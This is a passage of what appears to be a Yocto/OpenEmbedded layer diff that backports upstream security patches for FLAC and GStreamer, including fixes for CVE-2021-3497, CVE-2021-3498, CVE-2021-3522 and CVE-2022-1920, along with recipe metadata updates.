++ return 0;
++ return realloc(ptr, size2);
++}
++
++static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1) {
+ free(ptr);
+ return 0;
+ }
+- return realloc(ptr, size2);
++ size3 += size2;
++ if(size3 < size2) {
++ free(ptr);
++ return 0;
++ }
++ return safe_realloc_(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
++static inline void *safe_realloc_nofree_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -182,7 +195,7 @@ static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2,
+ return realloc(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
++static inline void *safe_realloc_nofree_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -205,6 +218,15 @@ static inline void *safe_realloc_mul_2op_(void *ptr, size_t size1, size_t size2)
+ return safe_realloc_(ptr, size1*size2);
+ }
+
++static inline void *safe_realloc_nofree_mul_2op_(void *ptr, size_t size1, size_t size2)
++{
++ if(!size1 || !size2)
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ if(size1 > SIZE_MAX / size2)
++ return 0;
++ return realloc(ptr, size1*size2);
++}
++
+ /* size1 * (size2 + size3) */
+ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+@@ -216,4 +238,15 @@ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2,
+ return safe_realloc_mul_2op_(ptr, size1, size2);
+ }
+
++/* size1 * (size2 + size3) */
++static inline void *safe_realloc_nofree_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
++{
++ if(!size1 || (!size2 && !size3))
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ size2 += size3;
++ if(size2 < size3)
++ return 0;
++ return safe_realloc_nofree_mul_2op_(ptr, size1, size2);
++}
++
+ #endif
+diff --git a/src/flac/encode.c b/src/flac/encode.c
+index a9b907f..f87250c 100644
+--- a/src/flac/encode.c
++++ b/src/flac/encode.c
+@@ -1743,10 +1743,10 @@ static void static_metadata_clear(static_metadata_t *m)
+ static FLAC__bool static_metadata_append(static_metadata_t *m, FLAC__StreamMetadata *d, FLAC__bool needs_delete)
+ {
+ void *x;
+- if(0 == (x = safe_realloc_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->metadata = (FLAC__StreamMetadata**)x;
+- if(0 == (x = safe_realloc_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->needs_delete = (FLAC__bool*)x;
+ m->metadata[m->num_metadata] = d;
+diff --git a/src/flac/foreign_metadata.c b/src/flac/foreign_metadata.c
+index 9ad9c18..fdfb3cf 100644
+--- a/src/flac/foreign_metadata.c
++++ b/src/flac/foreign_metadata.c
+@@ -75,7 +75,7 @@ static FLAC__bool copy_data_(FILE *fin, FILE *fout, size_t size, const char **er
+
+ static FLAC__bool append_block_(foreign_metadata_t *fm, FLAC__off_t offset, FLAC__uint32 size, const char **error)
+ {
+- foreign_block_t *fb = safe_realloc_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
++ foreign_block_t *fb = safe_realloc_nofree_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
+ if(fb) {
+ fb[fm->num_blocks].offset = offset;
+ fb[fm->num_blocks].size = size;
+diff --git a/src/libFLAC/bitwriter.c b/src/libFLAC/bitwriter.c
+index 6e86585..a510b0d 100644
+--- a/src/libFLAC/bitwriter.c
++++ b/src/libFLAC/bitwriter.c
+@@ -124,7 +124,7 @@ FLAC__bool bitwriter_grow_(FLAC__BitWriter *bw, uint32_t bits_to_add)
+ FLAC__ASSERT(new_capacity > bw->capacity);
+ FLAC__ASSERT(new_capacity >= bw->words + ((bw->bits + bits_to_add + FLAC__BITS_PER_WORD - 1) / FLAC__BITS_PER_WORD));
+
+- new_buffer = safe_realloc_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
++ new_buffer = safe_realloc_nofree_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
+ if(new_buffer == 0)
+ return false;
+ bw->buffer = new_buffer;
+diff --git a/src/libFLAC/metadata_object.c b/src/libFLAC/metadata_object.c
+index de8e513..aef65be 100644
+--- a/src/libFLAC/metadata_object.c
++++ b/src/libFLAC/metadata_object.c
+@@ -98,7 +98,7 @@ static FLAC__bool free_copy_bytes_(FLAC__byte **to, const FLAC__byte *from, uint
+ /* realloc() failure leaves entry unchanged */
+ static FLAC__bool ensure_null_terminated_(FLAC__byte **entry, uint32_t length)
+ {
+- FLAC__byte *x = safe_realloc_add_2op_(*entry, length, /*+*/1);
++ FLAC__byte *x = safe_realloc_nofree_add_2op_(*entry, length, /*+*/1);
+ if (x != NULL) {
+ x[length] = '\0';
+ *entry = x;
+diff --git a/src/plugin_common/tags.c b/src/plugin_common/tags.c
+index ae440c5..dfa10d3 100644
+--- a/src/plugin_common/tags.c
++++ b/src/plugin_common/tags.c
+@@ -317,7 +317,7 @@ FLAC__bool FLAC_plugin__tags_add_tag_utf8(FLAC__StreamMetadata *tags, const char
+ const size_t value_len = strlen(value);
+ const size_t separator_len = strlen(separator);
+ FLAC__byte *new_entry;
+- if(0 == (new_entry = safe_realloc_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
++ if(0 == (new_entry = safe_realloc_nofree_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
+ return false;
+ memcpy(new_entry+entry->length, separator, separator_len);
+ entry->length += separator_len;
+diff --git a/src/share/utf8/iconvert.c b/src/share/utf8/iconvert.c
+index 8ab53c1..876c06e 100644
+--- a/src/share/utf8/iconvert.c
++++ b/src/share/utf8/iconvert.c
+@@ -149,7 +149,7 @@ int iconvert(const char *fromcode, const char *tocode,
+ iconv_close(cd1);
+ return ret;
+ }
+- newbuf = safe_realloc_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
++ newbuf = safe_realloc_nofree_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
+ if (!newbuf)
+ goto fail;
+ ob = (ob - utfbuf) + newbuf;
+--
+2.40.0
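
The split the commit message describes can be reduced to two realloc wrappers; the sketch below uses illustrative names rather than the actual FLAC helpers. The freeing variant fits call sites of the form x = helper(x, n); the non-freeing variant fits if (0 == (x = helper(y, n))) call sites where y stays owned by the caller and is freed later on its own error path.

    #include <stdlib.h>

    /* Freeing variant: safe for "x = helper(x, n)". On failure the old
     * block is released so the caller cannot leak it. */
    static void *realloc_or_free(void *ptr, size_t size)
    {
        void *newptr = realloc(ptr, size);
        if (newptr == NULL)
            free(ptr);
        return newptr;
    }

    /* Non-freeing variant: safe for "if (0 == (x = helper(y, n)))". The
     * caller still holds y and frees it on its own error path, so freeing
     * it here would set up a double free. */
    static void *realloc_nofree(void *ptr, size_t size)
    {
        return realloc(ptr, size);
    }
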
diff --git a/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
new file mode 100644
index 0000000000..e19833a5ad
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
@@ -0,0 +1,34 @@
+From e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be Mon Sep 17 00:00:00 2001
+From: Neelkamal Semwal <neelkamal.semwal@ittiam.com>
+Date: Fri, 18 Dec 2020 22:28:36 +0530
+Subject: [PATCH] libFlac: Exit at EOS in verify mode
+
+When verify mode is enabled, once the decoder flags end of stream,
+encode processing is considered complete.
+
+CVE-2021-0561
+
+Signed-off-by: Ralph Giles <giles@thaumas.net>
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be]
+CVE: CVE-2021-0561
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/libFLAC/stream_encoder.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/libFLAC/stream_encoder.c b/src/libFLAC/stream_encoder.c
+index 4c91247fe8..7109802c27 100644
+--- a/src/libFLAC/stream_encoder.c
++++ b/src/libFLAC/stream_encoder.c
+@@ -2610,7 +2610,9 @@ FLAC__bool write_bitbuffer_(FLAC__StreamEncoder *encoder, uint32_t samples, FLAC
+ encoder->private_->verify.needs_magic_hack = true;
+ }
+ else {
+- if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)) {
++ if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)
++ || (!is_last_block
++ && (FLAC__stream_encoder_get_verify_decoder_state(encoder) == FLAC__STREAM_DECODER_END_OF_STREAM))) {
+ FLAC__bitwriter_release_buffer(encoder->private_->frame);
+ FLAC__bitwriter_clear(encoder->private_->frame);
+ if(encoder->protected_->state != FLAC__STREAM_ENCODER_VERIFY_MISMATCH_IN_AUDIO_DATA)
diff --git a/meta/recipes-multimedia/flac/flac_1.3.3.bb b/meta/recipes-multimedia/flac/flac_1.3.3.bb
index cb6692aedf..e593727ac8 100644
--- a/meta/recipes-multimedia/flac/flac_1.3.3.bb
+++ b/meta/recipes-multimedia/flac/flac_1.3.3.bb
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING.FDL;md5=ad1419ecc56e060eccf8184a87c4285f \
DEPENDS = "libogg"
SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \
+ file://CVE-2020-22219.patch \
+ file://CVE-2021-0561.patch \
"
SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69"
diff --git a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
index cc7a7e78e2..6494013e3f 100644
--- a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
+++ b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
@@ -1,10 +1,13 @@
SUMMARY = "GStreamer examples (including gtk-play, gst-play)"
+DESCRIPTION = "GStreamer example applications"
+HOMEPAGE = "https://gitlab.freedesktop.org/gstreamer/gst-examples"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-examples/-/issues"
LICENSE = "LGPL-2.0+"
LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9"
DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native"
-SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \
file://0001-Make-player-examples-installable.patch \
file://gst-player.desktop \
"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
index 98355a1b75..a8ad777422 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Libav-based GStreamer 1.x plugin"
+DESCRIPTION = "Contains a GStreamer plugin for using the encoders, decoders, \
+muxers, and demuxers provided by FFmpeg."
HOMEPAGE = "http://gstreamer.freedesktop.org/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
index 1aa13cf73c..46653e2392 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
@@ -1,4 +1,5 @@
SUMMARY = "OpenMAX IL plugins for GStreamer"
+DESCRIPTION = "Wraps available OpenMAX IL components and makes them available as standard GStreamer elements."
HOMEPAGE = "http://gstreamer.freedesktop.org/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
index ffbaaf425a..f741db2172 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
@@ -1,5 +1,9 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Bad' GStreamer plugins and helper libraries "
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-bad/-/issues"
+
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \
file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
new file mode 100644
index 0000000000..3717f0cf3a
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
@@ -0,0 +1,36 @@
+From 067e759136904b82bba9c6d1d781c4408dfecfe6 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Tim-Philipp=20M=C3=BCller?= <tim@centricular.com>
+Date: Wed, 3 Mar 2021 01:08:25 +0000
+Subject: [PATCH] tag: id3v2: fix frame size check and potential invalid reads
+
+Check the right variable when checking if there's
+enough data left to read the frame size.
+
+Closes https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues/876
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/merge_requests/1066>
+
+Upstream-Status: Backport
+[https://gstreamer.freedesktop.org/security/sa-2021-0001.html]
+CVE: CVE-2021-3522
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ gst-libs/gst/tag/id3v2frames.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gst-libs/gst/tag/id3v2frames.c b/gst-libs/gst/tag/id3v2frames.c
+index 8e9f782..f39659b 100644
+--- a/gst-libs/gst/tag/id3v2frames.c
++++ b/gst-libs/gst/tag/id3v2frames.c
+@@ -109,7 +109,7 @@ id3v2_parse_frame (ID3TagsWorking * work)
+
+ if (work->frame_flags & (ID3V2_FRAME_FORMAT_COMPRESSION |
+ ID3V2_FRAME_FORMAT_DATA_LENGTH_INDICATOR)) {
+- if (work->hdr.frame_data_size <= 4)
++ if (frame_data_size <= 4)
+ return FALSE;
+ if (ID3V2_VER_MAJOR (work->hdr.version) == 3) {
+ work->parse_size = GST_READ_UINT32_BE (frame_data);
+--
+2.17.1
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
index a4f4772c1c..bcfdef3bbd 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
@@ -1,5 +1,8 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Base' GStreamer plugins and helper libraries"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues"
LICENSE = "GPLv2+ & LGPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \
file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607"
@@ -12,6 +15,7 @@ SRC_URI = " \
file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \
file://0005-viv-fb-Make-sure-config.h-is-included.patch \
file://0009-glimagesink-Downrank-to-marginal.patch \
+ file://CVE-2021-3522.patch \
"
SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4"
SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c"
@@ -97,3 +101,5 @@ def get_opengl_cmdline_list(switch_name, options, d):
return '-D' + switch_name + '=' + ','.join(selected_options)
else:
return ''
+
+CVE_PRODUCT += "gst-plugins-base"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
new file mode 100644
index 0000000000..81f7c59a7b
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
@@ -0,0 +1,207 @@
+From 9181191511f9c0be6a89c98b311f49d66bd46dc3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Thu, 4 Mar 2021 13:05:19 +0200
+Subject: [PATCH] matroskademux: Fix extraction of multichannel WavPack
+
+The old code had a couple of issues that all led to potential memory
+safety bugs.
+
+ - Use a constant for the Wavpack4Header size instead of using sizeof.
+ It's written out into the data and not from the struct and who knows
+ what special alignment/padding requirements some C compilers have.
+ - gst_buffer_set_size() does not realloc the buffer when setting a
+ bigger size than allocated, it only allows growing up to the maximum
+ allocated size. Instead use a GstAdapter to collect all the blocks
+ and take out everything at once in the end.
+ - Check that enough data is actually available in the input and
+ otherwise handle it as an error in all cases instead of silently
+ ignoring it.
+
+Among other things this fixes out of bounds writes because the code
+assumed gst_buffer_set_size() can grow the buffer and simply wrote after
+the end of the buffer.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/859
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/9181191511f9c0be6a89c98b311f49d66bd46dc3?merge_request_iid=903
+CVE: CVE-2021-3497
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 99 +++++++++++++++++++----------------
+ gst/matroska/matroska-ids.h | 2 +
+ 2 files changed, 55 insertions(+), 46 deletions(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 467815986..0e47ee7b5 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3851,6 +3851,12 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ guint32 block_samples, tmp;
+ gsize size = gst_buffer_get_size (*buf);
+
++ if (size < 4) {
++ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ return GST_FLOW_ERROR;
++ }
++
+ gst_buffer_extract (*buf, 0, &tmp, sizeof (guint32));
+ block_samples = GUINT32_FROM_LE (tmp);
+ /* we need to reconstruct the header of the wavpack block */
+@@ -3858,10 +3864,10 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ /* -20 because ck_size is the size of the wavpack block -8
+ * and lace_size is the size of the wavpack block + 12
+ * (the three guint32 of the header that already are in the buffer) */
+- wvh.ck_size = size + sizeof (Wavpack4Header) - 20;
++ wvh.ck_size = size + WAVPACK4_HEADER_SIZE - 20;
+
+ /* block_samples, flags and crc are already in the buffer */
+- newbuf = gst_buffer_new_allocate (NULL, sizeof (Wavpack4Header) - 12, NULL);
++ newbuf = gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE - 12, NULL);
+
+ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+ data = outmap.data;
+@@ -3886,9 +3892,11 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ audiocontext->wvpk_block_index += block_samples;
+ } else {
+ guint8 *outdata = NULL;
+- guint outpos = 0;
+- gsize buf_size, size, out_size = 0;
++ gsize buf_size, size;
+ guint32 block_samples, flags, crc, blocksize;
++ GstAdapter *adapter;
++
++ adapter = gst_adapter_new ();
+
+ gst_buffer_map (*buf, &map, GST_MAP_READ);
+ buf_data = map.data;
+@@ -3897,6 +3905,7 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ if (buf_size < 4) {
+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
+ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
+ return GST_FLOW_ERROR;
+ }
+
+@@ -3918,59 +3927,57 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ data += 4;
+ size -= 4;
+
+- if (blocksize == 0 || size < blocksize)
+- break;
+-
+- g_assert ((newbuf == NULL) == (outdata == NULL));
++ if (blocksize == 0 || size < blocksize) {
++ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
+
+- if (newbuf == NULL) {
+- out_size = sizeof (Wavpack4Header) + blocksize;
+- newbuf = gst_buffer_new_allocate (NULL, out_size, NULL);
++ g_assert (newbuf == NULL);
+
+- gst_buffer_copy_into (newbuf, *buf,
+- GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++ newbuf =
++ gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE + blocksize,
++ NULL);
++ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
++ outdata = outmap.data;
++
++ outdata[0] = 'w';
++ outdata[1] = 'v';
++ outdata[2] = 'p';
++ outdata[3] = 'k';
++ outdata += 4;
++
++ GST_WRITE_UINT32_LE (outdata, blocksize + WAVPACK4_HEADER_SIZE - 8);
++ GST_WRITE_UINT16_LE (outdata + 4, wvh.version);
++ GST_WRITE_UINT8 (outdata + 6, wvh.track_no);
++ GST_WRITE_UINT8 (outdata + 7, wvh.index_no);
++ GST_WRITE_UINT32_LE (outdata + 8, wvh.total_samples);
++ GST_WRITE_UINT32_LE (outdata + 12, wvh.block_index);
++ GST_WRITE_UINT32_LE (outdata + 16, block_samples);
++ GST_WRITE_UINT32_LE (outdata + 20, flags);
++ GST_WRITE_UINT32_LE (outdata + 24, crc);
++ outdata += 28;
++
++ memcpy (outdata, data, blocksize);
+
+- outpos = 0;
+- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+- outdata = outmap.data;
+- } else {
+- gst_buffer_unmap (newbuf, &outmap);
+- out_size += sizeof (Wavpack4Header) + blocksize;
+- gst_buffer_set_size (newbuf, out_size);
+- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+- outdata = outmap.data;
+- }
++ gst_buffer_unmap (newbuf, &outmap);
++ gst_adapter_push (adapter, newbuf);
++ newbuf = NULL;
+
+- outdata[outpos] = 'w';
+- outdata[outpos + 1] = 'v';
+- outdata[outpos + 2] = 'p';
+- outdata[outpos + 3] = 'k';
+- outpos += 4;
+-
+- GST_WRITE_UINT32_LE (outdata + outpos,
+- blocksize + sizeof (Wavpack4Header) - 8);
+- GST_WRITE_UINT16_LE (outdata + outpos + 4, wvh.version);
+- GST_WRITE_UINT8 (outdata + outpos + 6, wvh.track_no);
+- GST_WRITE_UINT8 (outdata + outpos + 7, wvh.index_no);
+- GST_WRITE_UINT32_LE (outdata + outpos + 8, wvh.total_samples);
+- GST_WRITE_UINT32_LE (outdata + outpos + 12, wvh.block_index);
+- GST_WRITE_UINT32_LE (outdata + outpos + 16, block_samples);
+- GST_WRITE_UINT32_LE (outdata + outpos + 20, flags);
+- GST_WRITE_UINT32_LE (outdata + outpos + 24, crc);
+- outpos += 28;
+-
+- memmove (outdata + outpos, data, blocksize);
+- outpos += blocksize;
+ data += blocksize;
+ size -= blocksize;
+ }
+ gst_buffer_unmap (*buf, &map);
+- gst_buffer_unref (*buf);
+
+- if (newbuf)
+- gst_buffer_unmap (newbuf, &outmap);
++ newbuf = gst_adapter_take_buffer (adapter, gst_adapter_available (adapter));
++ g_object_unref (adapter);
+
++ gst_buffer_copy_into (newbuf, *buf,
++ GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++ gst_buffer_unref (*buf);
+ *buf = newbuf;
++
+ audiocontext->wvpk_block_index += block_samples;
+ }
+
+diff --git a/gst/matroska/matroska-ids.h b/gst/matroska/matroska-ids.h
+index 429213f77..8d4a685a9 100644
+--- a/gst/matroska/matroska-ids.h
++++ b/gst/matroska/matroska-ids.h
+@@ -688,6 +688,8 @@ typedef struct _Wavpack4Header {
+ guint32 crc; /* crc for actual decoded data */
+ } Wavpack4Header;
+
++#define WAVPACK4_HEADER_SIZE (32)
++
+ typedef enum {
+ GST_MATROSKA_TRACK_ENCODING_SCOPE_FRAME = (1<<0),
+ GST_MATROSKA_TRACK_ENCODING_SCOPE_CODEC_DATA = (1<<1),
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
new file mode 100644
index 0000000000..d3de2d5014
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
@@ -0,0 +1,44 @@
+From 02174790726dd20a5c73ce2002189bf240ad4fe0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 3 Mar 2021 11:31:52 +0200
+Subject: [PATCH] matroskademux: Initialize track context out parameter to NULL
+ before parsing
+
+Various error return paths don't set it to NULL and callers are only
+checking if the pointer is NULL. As it's allocated on the stack this
+usually contains random stack memory, and more often than not the memory
+of a previously parsed track.
+
+This then causes all kinds of memory corruptions further down the line.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/858
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport [
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/02174790726dd20a5c73ce2002189bf240ad4fe0?merge_request_iid=903 ]
+CVE: CVE-2021-3498
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 4d0234743..467815986 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -692,6 +692,8 @@ gst_matroska_demux_parse_stream (GstMatroskaDemux * demux, GstEbmlRead * ebml,
+
+ DEBUG_ELEMENT_START (demux, ebml, "TrackEntry");
+
++ *dest_context = NULL;
++
+ /* start with the master */
+ if ((ret = gst_ebml_read_master (ebml, &id)) != GST_FLOW_OK) {
+ DEBUG_ELEMENT_STOP (demux, ebml, "TrackEntry", ret);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
new file mode 100644
index 0000000000..ee33c5564d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
@@ -0,0 +1,59 @@
+From cf887f1b8e228bff6e19829e6d03995d70ad739d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 10:23:15 +0300
+Subject: [PATCH] matroskademux: Avoid integer-overflow resulting in heap
+ corruption in WavPack header handling code
+
+blocksize + WAVPACK4_HEADER_SIZE might overflow gsize, which then
+results in allocating a very small buffer. Into that buffer blocksize
+data is memcpy'd later which then causes out of bound writes and can
+potentially lead to anything from crashes to remote code execution.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1920
+
+https://gstreamer.freedesktop.org/security/sa-2022-0004.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1226
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2612>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-demux.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 64cc6be60be..01d754c3eb9 100644
